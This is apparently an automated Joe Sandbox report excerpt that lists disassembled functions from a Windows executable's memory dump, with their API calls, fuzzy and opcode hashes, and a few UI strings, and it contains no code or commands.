                                                                      • Instruction Fuzzy Hash: F401F7326001096BDB14EE29DC09BED7BBAAFC4334F0CC121ED19EB250D638D905C680
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007E8FB5
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007E8FBF
                                                                      • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 007E8FCC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: 616aa6038af35139787461aabcca07619f09096851091a7e9f4ad5350ffd41b6
                                                                      • Instruction ID: eee03b247621b3e54702db22f06a7db705ed3287a4c52f7a13ed6575afd72470
                                                                      • Opcode Fuzzy Hash: 616aa6038af35139787461aabcca07619f09096851091a7e9f4ad5350ffd41b6
                                                                      • Instruction Fuzzy Hash: 2331D27490122CABCB21DF24DC88BDCBBB8AF08310F5081EAE41CA7250EB349F858F45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: 235c05e3bb148d2539835e2995b61a794ddaebb07491cd345e8956dd3da28a4b
                                                                      • Instruction ID: 73d4638296cd1a175b788b672fca66ecb1c6c3c4df67688272371b65b130a7e4
                                                                      • Opcode Fuzzy Hash: 235c05e3bb148d2539835e2995b61a794ddaebb07491cd345e8956dd3da28a4b
                                                                      • Instruction Fuzzy Hash: 83313B71800289AFCB249E79CC85DFB7FBDDB4A304F0441A8F51893252E7389D448B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                      • Instruction ID: 77dce1f213e6d76a93d7ab1ef5f887a7673959646711f603f6e50d7802760a3d
                                                                      • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                      • Instruction Fuzzy Hash: F3022C71E012599FDF24CFA9C8806AEBBF1EF48314F25826AD919E7381D735AD41CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007DAF35
                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,007FE72C,?,?), ref: 007DAF84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FormatInfoLocaleNumber
                                                                      • String ID:
                                                                      • API String ID: 2169056816-0
                                                                      • Opcode ID: 448ecf78252079cbe9aae6470d402560b7038030fb2a1b24bed5900d21ddc835
                                                                      • Instruction ID: 3b05718a64bc327bf5baec4440c6e0f8cd37950f0ccbde55d6523e015e114fe4
                                                                      • Opcode Fuzzy Hash: 448ecf78252079cbe9aae6470d402560b7038030fb2a1b24bed5900d21ddc835
                                                                      • Instruction Fuzzy Hash: A7015E7A110318AAD7109FA4DC45FAA77BCFF09750F009422FB05D72A1D3749A14CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(007C6DDF,00000000,00000400), ref: 007C6C74
                                                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 007C6C95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: 871d7a2588478a6624ba309befef9774d46c8e7787067f2d613b6c8349ec4806
                                                                      • Instruction ID: 6a46f06530c7e6ebbc221ddea4354f73ffca4e27100f6676f4e86f9d9a6c1c08
                                                                      • Opcode Fuzzy Hash: 871d7a2588478a6624ba309befef9774d46c8e7787067f2d613b6c8349ec4806
                                                                      • Instruction Fuzzy Hash: 10D0C971348300BFFA210B618D46F2A7B9ABF45B51F18C80DB795E80E1CA7CE424E62D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007F19EF,?,?,00000008,?,?,007F168F,00000000), ref: 007F1C21
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 79425f93e019d6b6ef61d240df5f86e9d1beb348902c8747f9f99a0033f741e5
                                                                      • Instruction ID: 2b06fc3400773e461696c6d054e5c74b85b4a31639f151e3deea31e195f168f4
                                                                      • Opcode Fuzzy Hash: 79425f93e019d6b6ef61d240df5f86e9d1beb348902c8747f9f99a0033f741e5
                                                                      • Instruction Fuzzy Hash: E6B14C71210608DFD719CF28C48AB657BE0FF45364F658658EA9ACF3A1C339E992CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007DF66A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor
                                                                      • String ID:
                                                                      • API String ID: 2325560087-0
                                                                      • Opcode ID: 0ac7bba4e4338a21abe1478f169255524c805a5944930c621e895e9477621c57
                                                                      • Instruction ID: edafa4f66b8b77515bb9614e71c4993c2bad276e65bb513ea87488d7dd559515
                                                                      • Opcode Fuzzy Hash: 0ac7bba4e4338a21abe1478f169255524c805a5944930c621e895e9477621c57
                                                                      • Instruction Fuzzy Hash: FC517DB1A00609CFEB24CF54EC857AABBF4FB48314F64852BD406EB361D378A941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 007CB16B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID:
                                                                      • API String ID: 1889659487-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gj
                                                                      • API String ID: 0-4203073231
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,007DF3A5), ref: 007DF9DA
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71d26da86daf93217b40ff4e1158331a461e302a0d26580e1986caab02a6afac
                                                                      • Instruction ID: 811c5a0ef7c7bbd8ab2da6b0903aff6b66dd35780e35499f7dea5a637794da40
                                                                      • Opcode Fuzzy Hash: 71d26da86daf93217b40ff4e1158331a461e302a0d26580e1986caab02a6afac
                                                                      • Instruction Fuzzy Hash: 6F6199B5602FCD96CA38996B98957BE239CFB0E34CF14061AE643DF2C2D29DDC428315
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                      • Instruction ID: 66c6857db1b78d50ebc447a337827ca14fd3e090a5a895441f5709b07c0db568
                                                                      • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                      • Instruction Fuzzy Hash: F3512671603ECC97DB38897B855ABBF63C69B0E70CF180919F982CB282C61DED458395
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beedfcbc74097371a1ec96ec2005c06541e653d516403e2c84c7eb330b88f624
                                                                      • Instruction ID: b275918e1c26809c3cdb52a79f350a6ae776ec791fb5591847c08dabf3e91c63
                                                                      • Opcode Fuzzy Hash: beedfcbc74097371a1ec96ec2005c06541e653d516403e2c84c7eb330b88f624
                                                                      • Instruction Fuzzy Hash: AE51F8315093D58FC701CF34C14496EBFE1AE9A714F5909ADE4D95B243C238DA8ACB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a8979ca4eba055230558857beb40a6eee5c4d40a15a6f349793df4de84055605
                                                                      • Instruction ID: 3e4db564f9982034d74f681802afb9b14e17af806b54825cb17b3b694bd5c233
                                                                      • Opcode Fuzzy Hash: a8979ca4eba055230558857beb40a6eee5c4d40a15a6f349793df4de84055605
                                                                      • Instruction Fuzzy Hash: FD51F0B1A083159FC748CF19D88065AF7E1FF88314F058A2EE899E3300D734E959CB9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                      • Instruction ID: 7d3fbaabd0e3a1a87086cb068e2b6b2bea2cb16418e4a34685f90f07cf265c11
                                                                      • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                      • Instruction Fuzzy Hash: BA3118B1A1474A9FCB14DF28C85566EBBE0FB95304F50452EE485C7341C73CEA0ACB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 007CE30E
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                        • Part of subcall function 007D1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00801030,?,007CD928,00000000,?,00000050,00801030), ref: 007D1DC4
                                                                      • _strlen.LIBCMT ref: 007CE32F
                                                                      • SetDlgItemTextW.USER32(?,007FE274,?), ref: 007CE38F
                                                                      • GetWindowRect.USER32(?,?), ref: 007CE3C9
                                                                      • GetClientRect.USER32(?,?), ref: 007CE3D5
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007CE475
                                                                      • GetWindowRect.USER32(?,?), ref: 007CE4A2
                                                                      • SetWindowTextW.USER32(?,?), ref: 007CE4DB
                                                                      • GetSystemMetrics.USER32(00000008), ref: 007CE4E3
                                                                      • GetWindow.USER32(?,00000005), ref: 007CE4EE
                                                                      • GetWindowRect.USER32(00000000,?), ref: 007CE51B
                                                                      • GetWindow.USER32(00000000,00000002), ref: 007CE58D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                      • String ID: $%s:$CAPTION$d
                                                                      • API String ID: 2407758923-2512411981
                                                                      • Opcode ID: be82f3e2df29faf0e18d89e4e3aff9b1aedaecfee71785acedbe30466dda8f8b
                                                                      • Instruction ID: 3921e0869f20074bc4a26367c5b174cef0fd37c7387bcd1ae21dd9ea6ae12404
                                                                      • Opcode Fuzzy Hash: be82f3e2df29faf0e18d89e4e3aff9b1aedaecfee71785acedbe30466dda8f8b
                                                                      • Instruction Fuzzy Hash: 30819172208341AFD720DF68CD89F6BBBE9FB88704F04492DFA8497250D638E9058B52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 007ECB66
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC71E
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC730
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC742
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC754
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC766
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC778
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC78A
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC79C
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7AE
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7C0
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7D2
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7E4
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7F6
                                                                      • _free.LIBCMT ref: 007ECB5B
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007ECB7D
                                                                      • _free.LIBCMT ref: 007ECB92
                                                                      • _free.LIBCMT ref: 007ECB9D
                                                                      • _free.LIBCMT ref: 007ECBBF
                                                                      • _free.LIBCMT ref: 007ECBD2
                                                                      • _free.LIBCMT ref: 007ECBE0
                                                                      • _free.LIBCMT ref: 007ECBEB
                                                                      • _free.LIBCMT ref: 007ECC23
                                                                      • _free.LIBCMT ref: 007ECC2A
                                                                      • _free.LIBCMT ref: 007ECC47
                                                                      • _free.LIBCMT ref: 007ECC5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: e5d607f4debb472bb31e7796eed1198cab40e84a9948eef763d8eb89abe90cee
                                                                      • Instruction ID: 2c6a0fa51d39f45e94892a980405f55ae91aff69bb615fd05517623a9e7d3710
                                                                      • Opcode Fuzzy Hash: e5d607f4debb472bb31e7796eed1198cab40e84a9948eef763d8eb89abe90cee
                                                                      • Instruction Fuzzy Hash: 2D316075602285DFEB22AA3ADC4AB5677E9AF18310F244419E54CDB1A1DF38AC41CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetWindow.USER32(?,00000005), ref: 007DD6C1
                                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 007DD6ED
                                                                        • Part of subcall function 007D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007CC116,00000000,.exe,?,?,00000800,?,?,?,007D8E3C), ref: 007D1FD1
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 007DD709
                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 007DD720
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 007DD734
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 007DD75D
                                                                      • DeleteObject.GDI32(00000000), ref: 007DD764
                                                                      • GetWindow.USER32(00000000,00000002), ref: 007DD76D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                      • String ID: STATIC
                                                                      • API String ID: 3820355801-1882779555
                                                                      • Opcode ID: abc800cee40c76d72224fa9bd6611f1e87617fa10786fb2b04985ddfe0d107c0
                                                                      • Instruction ID: fffbda576d14ed863d23066adc33ebeec1cf9617ab849a02af2af57d2d787e79
                                                                      • Opcode Fuzzy Hash: abc800cee40c76d72224fa9bd6611f1e87617fa10786fb2b04985ddfe0d107c0
                                                                      • Instruction Fuzzy Hash: 3511D372640710BBE6316BB0AC4EFAF767CBF54761F008122FA51A62D1DA6CCF0646B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 007E9705
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007E9711
                                                                      • _free.LIBCMT ref: 007E971C
                                                                      • _free.LIBCMT ref: 007E9727
                                                                      • _free.LIBCMT ref: 007E9732
                                                                      • _free.LIBCMT ref: 007E973D
                                                                      • _free.LIBCMT ref: 007E9748
                                                                      • _free.LIBCMT ref: 007E9753
                                                                      • _free.LIBCMT ref: 007E975E
                                                                      • _free.LIBCMT ref: 007E976C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
